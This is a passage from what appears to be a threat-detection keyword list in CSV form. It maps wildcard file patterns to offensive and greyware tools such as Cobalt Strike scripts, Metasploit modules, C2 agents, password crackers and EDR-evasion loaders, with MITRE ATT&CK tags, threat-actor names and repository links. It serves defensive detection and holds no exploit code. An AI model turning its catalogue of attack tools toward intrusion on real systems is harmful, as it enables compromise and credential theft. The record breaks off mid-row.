Dharma9,Reconnaissance,https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Advanced_IP_Scanner*.exe*,greyware_tool_keyword,advanced-ip-scanner,The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA),T1595 - T1046,TA0007 - TA0011,N/A,Conti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9,Reconnaissance,https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Advanced_Port_Scanner_*.exe*,greyware_tool_keyword,advanced port scanner,port scanner tool abused by ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://www.advanced-port-scanner.com/,1,1,N/A,7,10,N/A,N/A,N/A,N/A -*Advanced-SQL-Injection-Cheatsheet*,offensive_tool_keyword,Advanced-SQL-Injection-Cheatsheet,A cheat sheet that contains advanced queries for SQL Injection of all types.,T1548 T1562 T1027,N/A,N/A,N/A,Exploitation tools,https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet,1,1,N/A,N/A,10,2239,568,2023-05-13T17:15:20Z,2020-10-23T18:14:47Z -*advantech_iview_networkservlet_cmd_inject.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*adxcsouf2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*ADZero.py*,offensive_tool_keyword,POC,Zerologon CVE exploitation,T1210 - T1072,TA0001 - TA0009,N/A,N/A,Exploitation tools,https://github.com/Privia-Security/ADZero,1,1,N/A,N/A,1,20,6,2020-10-02T13:00:21Z,2020-09-29T20:43:06Z -*aem2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*AES_cryptor.py *,offensive_tool_keyword,FilelessPELoader,Loading Remote AES Encrypted PE in memory - Decrypted it and run it,T1027.001 - T1059.001 - T1071,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/FilelessPELoader,1,0,N/A,10,8,727,148,2023-08-29T21:46:11Z,2023-02-08T16:59:33Z -*AesEncryptor.py*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*AF9C62A1-F8D2-4BE0-B019-0A7873E81EA9*,offensive_tool_keyword,GadgetToJScript,A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.,T1059.001 - T1078 - T1059.005,TA0002 - TA0004 - TA0001,N/A,N/A,Exploitation tools,https://github.com/med0x2e/GadgetToJScript,1,0,N/A,10,8,777,157,2021-07-26T17:35:40Z,2019-10-05T12:27:19Z -*ag_load_script*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*agent*DNSCommunication.cpp*,offensive_tool_keyword,DNS-Persist,DNS-Persist is a post-exploitation agent which uses DNS for command and control.,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/DNS-Persist,1,0,N/A,10,10,211,75,2017-11-20T08:53:25Z,2017-11-10T15:23:49Z -*agent/cmd_download_files.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*agent/cmd_exec.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*agent/cmd_kill.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*agent/cmd_proxy.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*agent/cmd_run.c*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*agent/cmd_shell.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*agent/cmd_sleep.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*agent/cmd_sysinfo.c*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*agent/cmd_upload_files.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*agent/dll.nim*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*agent/elf.nim*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*agent/exe.nim*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*Agent/ratchatPT.go*,offensive_tool_keyword,ratchatpt,C2 using openAI API,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,1,risk of False positive,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*agent\cmd_download_files.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*agent\cmd_exec.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*agent\cmd_kill.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*agent\cmd_proxy.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*agent\cmd_run.c*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*agent\cmd_shell.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*agent\cmd_sleep.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*agent\cmd_sysinfo.c*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*agent\cmd_upload_files.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*agent_code/bash_executor*,offensive_tool_keyword,mythic,mythic C2 agent,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/freyja/,1,1,N/A,10,10,11,6,2023-06-30T16:35:47Z,2022-09-28T17:20:04Z -*agent_dll.dll*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*agents/Follina-2*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*AggressiveProxy.cna*,offensive_tool_keyword,cobaltstrike,Project to enumerate proxy configurations and generate shellcode from CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/AggressiveProxy,1,1,N/A,10,10,139,26,2020-11-04T16:08:11Z,2020-11-04T12:53:00Z -*aggressor.beacons*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*aggressor.bshell*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*aggressor.cna*,offensive_tool_keyword,cobaltstrike,Collection of beacon BOF written to learn windows and cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Yaxser/CobaltStrike-BOF,1,1,N/A,10,10,297,54,2023-02-24T13:12:14Z,2020-10-08T01:12:41Z -*aggressor.dialog*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*aggressor.println*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*aggressor.py*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*Aggressor/TikiTorch*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*AggressorScripts*,offensive_tool_keyword,AggressorScripts-1,Collection of Aggressor scripts for Cobalt Strike 3.0+ pulled from multiple sources,T1074 - T1070 - T1105 - T1558,TA0007 - TA0003 - TA0002 - TA0043,N/A,N/A,Exploitation tools,https://github.com/Cn33liz/AggressorScripts-1,1,1,N/A,N/A,1,1,1,2018-06-24T16:27:57Z,2019-10-18T12:56:35Z -*aggressor-scripts*,offensive_tool_keyword,cobaltstrike,beacon generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/eddiezab/aggressor-scripts/tree/master,1,1,N/A,10,10,1,0,2021-01-29T21:01:58Z,2021-01-29T21:00:26Z -*Aggressor-Scripts*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - 